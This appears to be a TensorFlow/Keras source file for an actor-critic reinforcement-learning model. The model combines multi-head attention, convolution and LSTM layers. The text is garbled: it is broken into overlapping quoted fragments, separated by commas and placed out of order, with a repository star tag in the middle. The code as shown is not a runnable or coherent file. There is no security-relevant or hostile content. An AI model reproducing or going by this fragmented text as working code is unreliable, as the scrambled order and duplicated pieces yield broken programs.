padding='same') self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 =", "= self.layernorm1(x + attn_output) else: x = self.layernorm1(attn_output) if not self.last: ff_output =", "Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer =", "def call(self, v, k, q, mask): batch_size = tf.shape(q)[0] q = self.wq(q) #", "(..., seq_len_q, depth_v) return output, attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention,", "= self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2,", "in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def call(self, x, z): x", "self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5,", "in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks,", "call(self, x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output =", "// self.num_heads self.wq = Dense(d_model) self.wk = Dense(d_model) self.wv = Dense(d_model) self.dense =", "num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor,", "LSTM(lstm_units) def call(self, x, z, training, mask=None): z = self.embedding(z) z = self.bidirectional_lstm(z)", "# (batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape == 
(batch_size, num_heads, seq_len_q, depth) #", "(..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v) return output,", "Dense(num_policies, name='actor_output') def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class", "batch_size): \"\"\"Split the last dimension into (num_heads, depth). Transpose the result such that", "= 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units,", "lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs):", "hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic", "d_model) q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth) k = self.split_heads(k,", "(batch_size, seq_len, d_model) v = self.wv(v) # (batch_size, seq_len, d_model) q = self.split_heads(q,", "Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6)", "scaled_attention, attention_weights = scaled_dot_product_attention( q, k, v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2,", "(mask * -1e9) # softmax is normalized on the last axis (seq_len_k) so", "so that the scores # add up to 1. 
attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1)", "self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same' padding so", "depth) # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q,", "8, actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units,", "= tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) # add the mask to", "= Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split the last dimension into (num_heads, depth).", "attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q, k, v,", "= self.embedding(z) z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]])", "in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters,", "lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(1,", "attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False,", "seq_len_q, depth) # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention(", "self.wk(k) # (batch_size, seq_len, d_model) v = self.wv(v) # (batch_size, seq_len, d_model) q", "have the same shape as inputs. 
padding='same') self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2)", "# (batch_size, seq_len, d_model) v = self.wv(v) # (batch_size, seq_len, d_model) q =", "32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght)", "self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out,", "num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out)", "= self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x = self.layernorm2(x + ff_output) return x", "scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) # add the mask to the scaled tensor.", "= self.wq(q) # (batch_size, seq_len, d_model) k = self.wk(k) # (batch_size, seq_len, d_model)", "= self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return output, attention_weights class AttentionBlock(Layer): def __init__(self,", "attention_block in self.attention_blocks: x = attention_block(x) return self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies,", "q, k, v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size,", "transpose_b=True) # (..., seq_len_q, seq_len_k) # scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits", "import tensorflow as tf import tensorflow_probability as tfp from tensorflow.keras import Model, Sequential", "the same shape as inputs. 
padding='same') self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2", "= Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual self.last = last def call(self,", "shape as inputs. padding='same') self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim)", "perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size,", "= embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out", "is normalized on the last axis (seq_len_k) so that the scores # add", "(batch_size, seq_len_q, d_model) output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return output, attention_weights", "= 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters,", "residual self.last = last def call(self, x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output,", "= tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid')", "* -1e9) # softmax is normalized on the last axis (seq_len_k) so that", "= d_model // self.num_heads self.wq = Dense(d_model) self.wk = Dense(d_model) self.wv = Dense(d_model)", "seq_len, depth) \"\"\" x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0,", "return self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out =", "self.d_model = d_model assert d_model % self.num_heads == 0 self.depth = d_model //", "def call(self, 
x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output", "v, mask): matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k) # scale", "hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, name=\"shared", "embedding_out = 8, text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs)", "seq_len_q, seq_len_k) # scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk /", "Critic value = self.critic(x, z) # Actor actor_output = self.actor(x, z) std =", "= self.dropout2(ff_output, training=training) x = self.layernorm2(x + ff_output) return x class SharedBlock(Layer): def", "= self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth) v = self.split_heads(v, batch_size) #", "kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units))", "in self.attention_blocks: x = attention_block(x) return self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024,", "tfp from tensorflow.keras import Model, Sequential from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D,", "self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out =", "8, text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block =", "x = self.layernorm1(attn_output) if not self.last: ff_output = self.dense1(x) ff_output = self.dense2(ff_output) ff_output", "self.dense_layer = 
Dense(1, name='critic_output') def call(self, x, z): x = self.shared_block(x, z) return", "8, text_lenght=5, in_lstm_units = 32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding", "d_model // self.num_heads self.wq = Dense(d_model) self.wk = Dense(d_model) self.wv = Dense(d_model) self.dense", "seq_len_v, depth) # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth) # attention_weights.shape == (batch_size,", "vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units,", "tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import", "tf.float32) scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) # add the mask to the scaled", "attn_output = self.dropout1(attn_output, training=training) if self.residual: x = self.layernorm1(x + attn_output) else: x", "name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm", "self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out =", "for attention_block in self.attention_blocks: x = attention_block(x) return self.lstm_layer(x) class Actor(Layer): def __init__(self,", "numpy as np def scaled_dot_product_attention(q, k, v, mask): matmul_qk = tf.matmul(q, k, transpose_b=True)", "x = attention_block(x) return self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10,", "depth) k = self.split_heads(k, batch_size) # (batch_size, 
num_heads, seq_len_k, depth) v = self.split_heads(v,", "lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, name=\"shared block\", kernel_size=5,", "tf.concat([x, z], -1) for attention_block in self.attention_blocks: x = attention_block(x) return self.lstm_layer(x) class", "0 self.depth = d_model // self.num_heads self.wq = Dense(d_model) self.wk = Dense(d_model) self.wv", "vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor", "to 1. attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights,", "[x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x, z], -1) for attention_block in", "actor_output = self.actor(x, z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output =", "tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) # add the mask to the", "def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units =", "attn_output) else: x = self.layernorm1(attn_output) if not self.last: ff_output = self.dense1(x) ff_output =", "tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3]) def call(self,", "dimension into (num_heads, depth). 
Transpose the result such that the shape is (batch_size,", "z): x = self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024,", "32, embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim,", "self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3]) def call(self, v, k, q,", "output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return output, attention_weights class AttentionBlock(Layer): def", "block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm =", "last axis (seq_len_k) so that the scores # add up to 1. attention_weights", "num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q, k, v, mask) scaled_attention =", "super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6)", "Actor actor_output = self.actor(x, z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output", "Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import numpy as", "tf.transpose(x, perm=[0, 2, 1, 3]) def call(self, v, k, q, mask): batch_size =", "= self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape == (batch_size, num_heads,", "split_heads(self, x, batch_size): \"\"\"Split the last dimension into (num_heads, depth). 
Transpose the result", "text_lenght=5, in_lstm_units = 32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding =", "x, z): # Critic value = self.critic(x, z) # Actor actor_output = self.actor(x,", "def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model = d_model assert", "up to 1. attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k) output =", "self.embedding(z) z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x", "shape is (batch_size, num_heads, seq_len, depth) \"\"\" x = tf.reshape(x, (batch_size, -1, self.num_heads,", "= Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer", "z) return self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184,", "self.wq = Dense(d_model) self.wk = Dense(d_model) self.wv = Dense(d_model) self.dense = Dense(d_model) def", "axis (seq_len_k) so that the scores # add up to 1. attention_weights =", "into (num_heads, depth). 
Transpose the result such that the shape is (batch_size, num_heads,", "8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block =", "seq_len_k, depth) v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape", "self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim,", "= self.critic(x, z) # Actor actor_output = self.actor(x, z) std = tf.zeros_like(actor_output) +", "tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output) dist = tfp.distributions.Normal(loc=actor_output, scale=std) return", "k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth) v = self.split_heads(v, batch_size)", "== 0 self.depth = d_model // self.num_heads self.wq = Dense(d_model) self.wk = Dense(d_model)", "Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same' padding so outputs have the same shape", "last dimension into (num_heads, depth). Transpose the result such that the shape is", "return self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5,", "(seq_len_k) so that the scores # add up to 1. 
attention_weights = tf.nn.softmax(scaled_attention_logits,", "i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self, x, z, training, mask=None): z", "Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import numpy as np def", "d_model % self.num_heads == 0 self.depth = d_model // self.num_heads self.wq = Dense(d_model)", "self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units)", "vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name,", "batch_size = tf.shape(q)[0] q = self.wq(q) # (batch_size, seq_len, d_model) k = self.wk(k)", "embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5,", "Dense(d_model) self.wk = Dense(d_model) self.wv = Dense(d_model) self.dense = Dense(d_model) def split_heads(self, x,", "def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer): def", "self.depth = d_model // self.num_heads self.wq = Dense(d_model) self.wk = Dense(d_model) self.wv =", "ff_output = self.dense1(x) ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x = self.layernorm2(x", "matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k) # scale matmul_qk dk", "std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output) dist = tfp.distributions.Normal(loc=actor_output,", "1, 3]) def call(self, v, k, q, mask): batch_size = tf.shape(q)[0] q =", "self.dropout2(ff_output, training=training) x = self.layernorm2(x + ff_output) return x class SharedBlock(Layer): def __init__(self,", 
"-1e9) # softmax is normalized on the last axis (seq_len_k) so that the", "(batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3]) def call(self, v,", "Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split the last dimension into (num_heads, depth). Transpose", "num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, name=\"shared block\", kernel_size=5, **kwargs):", "num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, #", "(batch_size, seq_len, d_model) k = self.wk(k) # (batch_size, seq_len, d_model) v = self.wv(v)", "depth_v) return output, attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads", "embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def call(self, x, z): x = self.shared_block(x, z)", "seq_len_q, depth) k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth) v =", "Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for", "embedding_out = 8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs)", "if mask is not None: scaled_attention_logits += (mask * -1e9) # softmax is", "in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(1, name='critic_output') def call(self, x, z): x", "self.critic(x, z) # Actor actor_output = self.actor(x, z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd)", "+ tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output) dist = 
tfp.distributions.Normal(loc=actor_output, scale=std) return value,", "= Dense(d_model) self.dense = Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split the last dimension", "z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x, z], -1)", "x = tf.concat([x, z], -1) for attention_block in self.attention_blocks: x = attention_block(x) return", "MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model = d_model", "num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out = 8, actor_activation=False):", "= Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size,", "+ ff_output) return x class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184,", "# (..., seq_len_q, depth_v) return output, attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads):", "batch_size) # (batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth)", "attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model", "MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size,", "z) return self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out", "tensorflow_probability as tfp from tensorflow.keras import Model, Sequential 
from tensorflow.keras.layers import Activation, Layer,", "self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3]) def call(self, v, k, q, mask):", "in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units =", "text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def call(self,", "None: scaled_attention_logits += (mask * -1e9) # softmax is normalized on the last", "assert d_model % self.num_heads == 0 self.depth = d_model // self.num_heads self.wq =", "= num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out =", "# (..., seq_len_q, seq_len_k) # scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits =", "matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) # add the", "# attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q, k,", "in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self, x, z, training, mask=None): z =", "# Critic value = self.critic(x, z) # Actor actor_output = self.actor(x, z) std", "= 32, embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies = num_policies,", "training, mask=None): z = self.embedding(z) z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]),", "num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]),", "num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in 
range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self, x,", "= 32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out,", "Bidirectional import numpy as np def scaled_dot_product_attention(q, k, v, mask): matmul_qk = tf.matmul(q,", "kernel_size=5, in_lstm_units = 32, embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies", "the last axis (seq_len_k) so that the scores # add up to 1.", "3]) def call(self, v, k, q, mask): batch_size = tf.shape(q)[0] q = self.wq(q)", "dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self, x,", "so outputs have the same shape as inputs. padding='same') self.activation_layer = Activation('relu') self.dense1", "self.last: ff_output = self.dense1(x) ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x =", "x = self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128,", "Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual", "self.dense1(x) ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x = self.layernorm2(x + ff_output)", "in_lstm_units = 32, embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies =", "% self.num_heads == 0 self.depth = d_model // self.num_heads self.wq = Dense(d_model) self.wk", "scores # add up to 1. 
attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q,", "output, attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads", "AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock,", "z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output) dist =", ",name='logstd') self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self, x, z):", "self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth) k = self.split_heads(k, batch_size) # (batch_size,", "num_heads, seq_len_q, depth) k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth) v", "name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5,", "num_heads, seq_len_q, depth) # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights =", "num_heads, seq_len, depth) \"\"\" x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x,", "last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self, x, z, training,", "self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual self.last = last def call(self, x, training,", "<gh_stars>1-10 import tensorflow as tf import tensorflow_probability as tfp from tensorflow.keras import Model,", "= self.layernorm1(attn_output) if not self.last: ff_output = self.dense1(x) ff_output = 
